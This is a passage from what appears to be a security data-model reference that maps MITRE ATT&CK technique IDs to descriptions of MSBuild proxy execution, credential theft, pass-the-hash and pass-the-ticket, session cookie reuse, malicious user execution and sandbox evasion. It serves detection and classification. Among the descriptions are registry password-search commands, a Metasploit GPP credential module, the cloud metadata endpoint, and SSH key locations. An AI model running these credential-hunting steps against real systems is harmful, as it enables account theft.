various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX
Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker)
These utilities may often be signed with legitimate certificates that allow them to execute on a system and
proxy execution of malicious code through a trusted process that effectively bypasses application control
solutions. https://attack.mitre.org/techniques/T1127
Original Mapped Description

T1127.001 XDM_CONST.MITRE_TECHNIQUE_TRUSTED_DEVELOPER_UTILITIES_PROXY_EXECUTION_MSBUILD Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe
(Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted
project files that define requirements for loading and building various platforms and configurations.(Citation:
MSDN MSBuild) Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task
capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be
inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017)
MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is
used this way it can execute arbitrary code and bypass application control defenses that are configured to
allow MSBuild.exe execution.(Citation: LOLBAS Msbuild) https://attack.mitre.org/techniques/T1127/001

T1199 XDM_CONST.MITRE_TECHNIQUE_TRUSTED_RELATIONSHIP Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access
through trusted third party relationship exploits an existing connection that may not be protected or receives
less scrutiny than standard mechanisms of gaining access to a network. Organizations often grant elevated
access to second or third-party external providers in order to allow them to manage internal systems as well
as cloud-based environments. Some examples of these relationships include IT services contractors,
managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-
party provider's access may be intended to be limited to the infrastructure being maintained, but may exist
on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/
techniques/T1078) used by the other party for access to internal network systems may be compromised
and used.(Citation: CISA IT Service Providers) https://attack.mitre.org/techniques/T1199

T1111 XDM_CONST.MITRE_TECHNIQUE_TWO_FACTOR_AUTHENTICATION_INTERCEPTION Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to
credentials that can be used to access systems, services, and network resources. Use of two or multi-factor
authentication (2FA or MFA) is recommended and provides a higher level of security than user names and
passwords alone, but organizations should be aware of techniques that could be used to intercept and
bypass these security mechanisms. If a smart card is used for two-factor authentication, then a keylogger
will need to be used to obtain the password associated with a smart card during normal use. With both an
inserted card and access to the smart card password, an adversary can connect to a network resource
using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant
M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such
as RSA SecurID. Capturing token input (including a user's personal identification code) may provide
temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly
enabling adversaries to reliably predict future authentication values (given access to both the algorithm and
any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other
methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time
codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured,
then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these
authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental) https://
attack.mitre.org/techniques/T1111

T1552 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS Adversaries may search compromised systems to find and obtain insecurely stored credentials. These
credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g.
[Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific
repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other
specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)). https://
attack.mitre.org/techniques/T1552

T1552.003 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_BASH_HISTORY Adversaries may search the bash command history on compromised systems for insecurely stored
credentials. Bash keeps track of the commands users type on the command-line with the "history" utility.
Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides
at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands.
Users often type usernames and passwords on the command-line as parameters to programs, which then
get saved to this file when they log out. Attackers can abuse this by looking through the file for potential
credentials. (Citation: External to DA, the OS X Way) https://attack.mitre.org/techniques/T1552/003

T1552.005 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_CLOUD_INSTANCE_METADATA_API Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other
sensitive data. Most cloud service providers support a Cloud Instance Metadata API which is a service
provided to running virtual instances that allows applications to access information about the running virtual
instance. Available information generally includes name, security group, and additional metadata including
sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance
Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone
who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used
in at least one high profile compromise.(Citation: Krebs Capital One August 2019) If adversaries have a
presence on the running virtual instance, they may query the Instance Metadata API directly to identify
credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side
Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to
the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata
API 2018) The de facto standard across cloud service providers is to host the Instance Metadata API at
http[:]//169.254.169.254. https://attack.mitre.org/techniques/T1552/005

T1552.007 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_CONTAINER_API Adversaries may gather credentials via APIs within a containers environment. APIs in these environments,
such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources
and cluster components.(Citation: Docker API)(Citation: Kubernetes API) An adversary may access the
Docker API to collect logs that contain credentials to cloud, container, and various other resources in the
environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such
as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the
Kubernetes API server. These credentials may include those needed for Docker API authentication or
secrets from Kubernetes cluster components. https://attack.mitre.org/techniques/T1552/007

T1552.001 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_CREDENTIALS_IN_FILES Adversaries may search local file systems and remote file shares for files containing insecurely stored
credentials. These can be files created by users to store their own credentials, shared credential stores for
a group of individuals, configuration files containing passwords for a system or service, or source code/
binary files containing embedded passwords. It is possible to extract passwords from backups or saved
virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG
2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain
Controller. (Citation: SRD GPP) In cloud and/or containerized environments, authenticated user and service
account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard
Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit
42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine
or the contents can be read and then used to authenticate without needing to copy any files.(Citation:
Specter Ops - Cloud Credential Storage) https://attack.mitre.org/techniques/T1552/001

T1552.002 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_CREDENTIALS_IN_REGISTRY Adversaries may search the Registry on compromised systems for insecurely stored credentials. The
Windows Registry stores configuration information that can be used by the system or other programs.
Adversaries may query the Registry looking for credentials and passwords that have been stored for use by
other programs or services. Sometimes these credentials are used for automatic logons. Example
commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials) *
Local Machine Hive: reg query HKLM /f password /t REG_SZ /s * Current User Hive: reg query
HKCU /f password /t REG_SZ /s https://attack.mitre.org/techniques/T1552/002

T1552.006 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_GROUP_POLICY_PREFERENCES Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools
that allow administrators to create domain policies with embedded credentials. These policies allow
administrators to set local accounts.(Citation: Microsoft GPP 2016) These group policies are stored in
SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and
decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key) The
following tools and scripts can be used to gather and decrypt the password file from Group Policy
Preference XML files: * Metasploit’s post exploitation module: post/windows/gather/credentials/gpp *
Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword) * gpprefdecrypt.py On the SYSVOL
share, adversaries may use the following command to enumerate potential GPP XML files: dir /s * .xml
https://attack.mitre.org/techniques/T1552/006
Original Mapped Description

T1552.004 XDM_CONST.MITRE_TECHNIQUE_UNSECURED_CREDENTIALS_PRIVATE_KEYS Adversaries may search for private key certificate files on compromised systems for insecurely stored
credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption,
and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions
include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key
directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on
Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/
techniques/T1021) like SSH or for use in decrypting other collected files such as email. Adversary tools
have been discovered that search compromised systems for file extensions relating to cryptographic keys
and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia) Some private keys require
a password or passphrase for operation, so an adversary may also use [Input Capture](https://
attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/
techniques/T1110) the passphrase off-line. https://attack.mitre.org/techniques/T1552/004

T1535 XDM_CONST.MITRE_TECHNIQUE_UNSUPPORTED_CLOUD_REGIONS Adversaries may create cloud instances in unused geographic service regions in order to evade detection.
Access is usually obtained through compromising accounts used to manage cloud infrastructure. Cloud
service providers often provide infrastructure throughout the world in order to improve performance, provide
redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a
subset of the available regions and may not actively monitor other regions. If an adversary creates
resources in an unused region, they may be able to operate undetected. A variation on this behavior takes
advantage of differences in functionality across cloud regions. An adversary could utilize regions which do
not support advanced detection services in order to avoid detection of their activity. An example of
adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://
attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time
depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions) https://
attack.mitre.org/techniques/T1535

T1550 XDM_CONST.MITRE_TECHNIQUE_USE_ALTERNATE_AUTHENTICATION_MATERIAL Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and
application access tokens, in order to move laterally within an environment and bypass normal system
access controls. Authentication processes generally require a valid identity (e.g., username) along with one
or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate
authentication material is legitimately generated by systems after a user or application successfully
authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication
material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation:
NIST MFA) Caching alternate authentication material allows the system to verify an identity has
successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate
authentication must be maintained by the system—either in memory or on disk—it may be at risk of being
stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate
authentication material, adversaries are able to bypass system access controls and authenticate to systems
without knowing the plaintext password or any additional authentication factors. https://attack.mitre.org/
techniques/T1550

T1550.001 XDM_CONST.MITRE_TECHNIQUE_USE_ALTERNATE_AUTHENTICATION_MATERIAL_APPLICATION_ACCESS_TOKEN Adversaries may use stolen application access tokens to bypass the typical authentication process and
access restricted accounts, information, or services on remote systems. These tokens are typically stolen
from users and used in lieu of login credentials. Application access tokens are used to make authorized API
requests on behalf of a user and are commonly used as a way to access resources in cloud-based
applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access
Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to
users for access to systems. These frameworks are used collaboratively to verify the user and determine
what actions the user is allowed to perform. Once identity is established, the token allows actions to be
authorized, without passing the actual credentials of the user. Therefore, compromise of the token can
grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For
example, with a cloud-based email service once an OAuth access token is granted to a malicious
application, it can potentially gain long-term access to features of the user account if a "refresh" token
enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth
access token an adversary can use the user-granted REST API to perform functions such as email
searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access
tokens may be used as an initial step in compromising other services. For example, if a token grants
access to a victim’s primary email, the adversary may be able to extend access to all other services which
the target subscribes by triggering forgotten password routines. Direct API access through a token negates
the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like
changing passwords. Access abuse over an API channel can be difficult to detect even from the service
provider end, as the access can still align well with a legitimate workflow. https://attack.mitre.org/
techniques/T1550/001

T1550.002 XDM_CONST.MITRE_TECHNIQUE_USE_ALTERNATE_AUTHENTICATION_MATERIAL_PASS_THE_HASH Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment,
bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user
without having access to the user's cleartext password. This method bypasses standard authentication
steps that require a cleartext password, moving directly into the portion of the authentication that uses the
password hash. When performing PtH, valid password hashes for the account being used are captured
using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used
with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or
remote systems. Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH,
this involves using a password hash to authenticate as a user but also uses the password hash to create a
valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/
techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash) https://attack.mitre.org/
techniques/T1550/002

T1550.003 XDM_CONST.MITRE_TECHNIQUE_USE_ALTERNATE_AUTHENTICATION_MATERIAL_PASS_THE_TICKET Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment,
bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system
using Kerberos tickets without having access to an account's password. Kerberos authentication can be
used as the first step to lateral movement to a remote system. When preforming PtT, valid Kerberos tickets
for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping]
(https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be
obtained, depending on the level of access. A service ticket allows for access to a particular resource,
whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access
any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation:
GentilKiwi Pass the Ticket) A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained
for services that use Kerberos as an authentication mechanism and are used to generate tickets to access
that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD
Kerberos Attacks) A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the
domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables
generation of TGTs for any account in Active Directory.(Citation: Campbell 2014) Adversaries may also
create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys.
For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e.
[Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to
create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash) https://attack.mitre.org/techniques/
T1550/003

T1550.004 XDM_CONST.MITRE_TECHNIQUE_USE_ALTERNATE_AUTHENTICATION_MATERIAL_WEB_SESSION_COOKIE Adversaries can use stolen session cookies to authenticate to web applications and services. This
technique bypasses some multi-factor authentication protocols since the session is already authenticated.
(Citation: Pass The Cookie) Authentication cookies are commonly used in web applications, including
cloud-based services, after a user has authenticated to the service so credentials are not passed and re-
authentication does not need to occur as frequently. Cookies are often valid for an extended period of time,
even if the web application is not actively used. After the cookie is obtained through [Steal Web Session
Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/
T1606/001), the adversary may then import the cookie into a browser they control and is then able to use
the site or application as the user for as long as the session cookie is active. Once logged into the site, an
adversary can access sensitive information, read email, or perform actions that the victim account has
permissions to perform. There have been examples of malware targeting session cookies to bypass multi-
factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019) https://attack.mitre.org/
techniques/T1550/004
Original Mapped Description

T1204 XDM_CONST.MITRE_TECHNIQUE_USER_EXECUTION An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected
to social engineering to get them to execute malicious code by, for example, opening a malicious document
file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing]
(https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/
T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as
when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on
it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/
T1534). https://attack.mitre.org/techniques/T1204

T1204.002 XDM_CONST.MITRE_TECHNIQUE_USER_EXECUTION_MALICIOUS_FILE An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be
subjected to social engineering to get them to open a file that will lead to code execution. This user action
will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/
techniques/T1566/001). Adversaries may use several types of files that require a user to execute them,
including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of
[Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user
will open it. While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly
after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in
a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen
shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). https://attack.mitre.org/
techniques/T1204/002

T1204.003 XDM_CONST.MITRE_TECHNIQUE_USER_EXECUTION_MALICIOUS_IMAGE Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services
(AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well
as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to
a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may
then download and deploy an instance or container from the image without realizing the image is malicious,
thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of
malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation:
Summit Route Malicious AMIs) Adversaries may also name images a certain way to increase the chance of
users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or
Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat
Report June 2021) https://attack.mitre.org/techniques/T1204/003

T1204.001 XDM_CONST.MITRE_TECHNIQUE_USER_EXECUTION_MALICIOUS_LINK An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be
subjected to social engineering to get them to click on a link that will lead to code execution. This user
action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/
techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation
of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/
techniques/T1203). Links may also lead users to download files that require execution via [Malicious File]
(https://attack.mitre.org/techniques/T1204/002). https://attack.mitre.org/techniques/T1204/001

T1078 XDM_CONST.MITRE_TECHNIQUE_VALID_ACCOUNTS Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access,
Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass
access controls placed on various resources on systems within the network and may even be used for
persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access
and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific
systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools
in conjunction with the legitimate access those credentials provide to make it harder to detect their
presence. The overlap of permissions for local, domain, and cloud accounts across a network of systems is
of concern because the adversary may be able to pivot across accounts and systems to reach a high level
of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.
(Citation: TechNet Credential Theft) https://attack.mitre.org/techniques/T1078

T1078.004 XDM_CONST.MITRE_TECHNIQUE_VALID_ACCOUNTS_CLOUD_ACCOUNTS Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access,
Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by
an organization for use by users, remote support, services, or for administration of resources within a cloud
service provider or SaaS application. In some cases, cloud accounts may be federated with traditional
identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)
(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials
for cloud accounts can be used to harvest sensitive data from online storage accounts and databases.
Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted
Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://
attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to
more easily move laterally within an environment. https://attack.mitre.org/techniques/T1078/004

T1078.001 XDM_CONST.MITRE_TECHNIQUE_VALID_ACCOUNTS_DEFAULT_ACCOUNTS Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access,
Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS,
such as the Guest or Administrator accounts on Windows systems. Default accounts also include default
factory/provider set accounts on other types of systems, software, or devices, including the root user
account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb
2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) Default accounts are not limited to
client machines, rather also include accounts that are preset for equipment such as network devices and
computer applications whether they are internal, open source, or commercial. Appliances that come preset
with a username and password combination pose a serious threat to organizations that do not change it
post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly
disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to
legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/
T1021).(Citation: Metasploit SSH Module) https://attack.mitre.org/techniques/T1078/001

T1078.002 XDM_CONST.MITRE_TECHNIQUE_VALID_ACCOUNTS_DOMAIN_ACCOUNTS Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access,
Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain
accounts are those managed by Active Directory Domain Services where access and permissions are
configured across systems and services that are part of that domain. Domain accounts can cover users,
administrators, and services.(Citation: Microsoft AD Accounts) Adversaries may compromise domain
accounts, some with a high level of privileges, through various means such as [OS Credential Dumping]
(https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of
the domain. https://attack.mitre.org/techniques/T1078/002

T1078.003 XDM_CONST.MITRE_TECHNIQUE_VALID_ACCOUNTS_LOCAL_ACCOUNTS Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access,
Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an
organization for use by users, remote support, services, or for administration on a single system or service.
Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential
Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local
accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral
Movement. https://attack.mitre.org/techniques/T1078/003

T1125 XDM_CONST.MITRE_TECHNIQUE_VIDEO_CAPTURE An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or
applications (e.g., video call services) to capture video recordings for the purpose of gathering information.
Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video
files. Malware or scripts may be used to interact with the devices through an available API provided by the
operating system or an application to capture video or images. Video or image files may be written to disk
and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113)
due to use of specific devices or applications for video recording rather than capturing the victim's screen.
In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and
Proton. (Citation: objective-see 2017 review) https://attack.mitre.org/techniques/T1125
Original Mapped Description

T1497 XDM_CONST.MITRE_TECHNIQUE_SANDBOX_EVASION Adversaries may employ various means to detect and avoid virtualization and analysis environments. This
may include changing behaviors based on the results of checks for the presence of artifacts indicative of a
virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their
malware to disengage from the victim or conceal the core functions of the implant. They may also search
for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information
learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated
discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness) Adversaries may use
several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts
associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help
determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within
malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015) https://
attack.mitre.org/techniques/T1497

T1497.001 XDM_CONST.MITRE_TECHNIQUE_SANDBOX_EVASION_SYSTEM_CHECKS Adversaries may employ various system checks to detect and avoid virtualization and analysis
environments. This may include changing behaviors based on the results of checks for the presence of
artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME,
they may alter their malware to disengage from the victim or conceal the core functions of the implant. They
may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use
the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
Specific checks will vary based on the target and/or adversary, but may involve behaviors such as
[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://
attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/
T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and
search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system,
hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and
then have the program exit if it determines the system to be a virtual environment. Checks could include
generic system properties such as host/domain name and samples of network traffic. Adversaries may also
check the network adapters addresses, CPU core count, and available memory/drive size. Other common
checks may enumerate services running that are unique to these applications, installed programs on the
system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific
hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare,
adversaries can also use a special I/O port to send commands and receive output. Hardware checks, such
as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can
be indicative a virtual environment. Adversaries may also query for specific readings from these devices.
(Citation: Unit 42 OilRig Sept 2018) https://attack.mitre.org/techniques/T1497/001

T1497.003 XDM_CONST.MITRE_TECHNIQUE_SANDBOX_EVASION_TIME_BASED_EVASION Adversaries may employ various time-based methods to detect and avoid virtualization and analysis
environments. This may include enumerating time-based properties, such as uptime or the system clock, as
well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox,
specifically those that are automated or only operate for a limited amount of time. Adversaries may employ
various time-based evasions, such as delaying malware functionality upon initial execution using
programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://
attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to
be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/
techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness) Benign
commands or other operations may also be used to delay malware execution. Loops or otherwise needless
repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay
malware execution and potentially exceed time thresholds of automated analysis environments.(Citation:
Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API
hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106)
functions in order to delay execution (while also potentially overloading analysis environments with junk
data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot) Adversaries may also use time as a metric to
detect sandboxes and analysis environments, particularly those that attempt to manipulate time
mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a
sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp
